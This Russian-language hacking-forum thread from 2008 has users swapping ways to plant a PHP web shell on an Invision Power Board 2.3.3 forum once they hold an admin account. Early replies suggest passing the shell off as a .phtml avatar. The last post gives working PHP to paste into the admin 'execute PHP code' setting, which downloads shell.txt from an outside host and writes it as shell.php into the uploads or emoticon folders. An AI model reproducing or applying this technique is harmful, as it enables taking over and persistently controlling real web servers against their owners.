IPB 2.3.3

Discussion in 'Песочница' started by Zabuldon, 14 Dec 2008.

  1. Zabuldon

    Zabuldon Elder - Старейшина

    Joined:
    6 Apr 2008
    Messages:
    99
    Likes Received:
    6
    Reputations:
    0
    Есть админский акк с правами ROOT.
    Задача: Залить шелл для просмотра файлов.

    Ребят подскажите оч надо...
     
  2. Xack-Zero

    Xack-Zero Member

    Joined:
    2 Dec 2006
    Messages:
    106
    Likes Received:
    31
    Reputations:
    0
    Акк на форум или на сервер?
     
    1 person likes this.
  3. Xack-Zero

    Xack-Zero Member

    Joined:
    2 Dec 2006
    Messages:
    106
    Likes Received:
    31
    Reputations:
    0
    Если форума учётка, то можно залить в качестве аватары. Для начала переименовав у шелла расширение в phtml и разреши установку данного расширения на аватар. Потом какому нибудь юзеру присвой эту зло-аву и потом перейди по этой аватарке. По стандарту на папку av ставят права 777, поэтому должно прокатить. Если помог, то +
     
    1 person likes this.
  4. Zabuldon

    Zabuldon Elder - Старейшина

    Joined:
    6 Apr 2008
    Messages:
    99
    Likes Received:
    6
    Reputations:
    0
    Запрещено загружать файлы такого типа, в качестве аватаров или фотографий
    Выдает....
    На загрузку установил разрешение. типы прописал не помогло.

    Еще варианты есть?
     
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Zabuldon, если детально хочешь, чтобы я объяснил, стучи 674-542. Есть вариант без авы.
     
    1 person likes this.
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Шас я в оффе. Квип качаю. Подожди минут 5.
     
  7. Xack-Zero

    Xack-Zero Member

    Joined:
    2 Dec 2006
    Messages:
    106
    Likes Received:
    31
    Reputations:
    0
    Стукни в аську 257-пять-518. Попробую похелпаю. =)
     
    1 person likes this.
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Не)) Стучи мне ;). Посмотри на его репу и посмотри на мою)! Разницу чувствуешь?
     
  9. Zabuldon

    Zabuldon Elder - Старейшина

    Joined:
    6 Apr 2008
    Messages:
    99
    Likes Received:
    6
    Reputations:
    0
    Еще варианты?
     
  10. Xack-Zero

    Xack-Zero Member

    Joined:
    2 Dec 2006
    Messages:
    106
    Likes Received:
    31
    Reputations:
    0
    mailbrush
    Поздно парень. И на будущее. Не гноби маленьких. Это не есть хорошо =)
     
  11. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    так что есть какието способы заливки шелла в этой версии???
     
  12. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    /showpost.php?p=914032&postcount=30


    Вот попробуй ... сломай админа и заливай шелл
     
  13. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    Doom123,акк админа у меня есть.
    Неполучается залить шелл.Пробывал через смайлики,через аватары и нефига(может есть какойто способ щаливки шелла выэту версию=//?
     
  14. Mapkyc_

    Mapkyc_ Elder - Старейшина

    Joined:
    15 Jul 2008
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Пробуй так НАСТРОЙКИ-->заходишь в любую жмешь Добавить новую настройку-->Выполнение PHP-кода до отображения или сохранения настройки
    Там пиши
    PHP:
    $linky="http://путькшеллу.com/shell.txt"
    $saved="Путь к папке /uploads/shell.php"
    $from=fopen("$linky","r"); 
    $to=fopen("$saved","w"); 
    while(!
    feof($from)){ 
    $string=fgets($from,4096); 
    fputs($to,$string); 
    }
    fclose($to); 
    fclose($from);
    Пример
    PHP:
    $linky="http://webpack.narod.ru/shell.txt"
    $saved="/home/crazy/public_html/forum/uploads/shell.php"
    $from=fopen("$linky","r"); 
    $to=fopen("$saved","w"); 
    while(!
    feof($from)){ 
    $string=fgets($from,4096); 
    fputs($to,$string); 
    }
    fclose($to); 
    fclose($from);
    Бывает что права для просмотра php файла в папке uploads закрыты, тогда пробуй заливать в папку style_emoticons или другие папки...
    PHP:
    $saved="/home/crazy/public_html/forum/style_emoticons/shell.php"
     
    1 person likes this.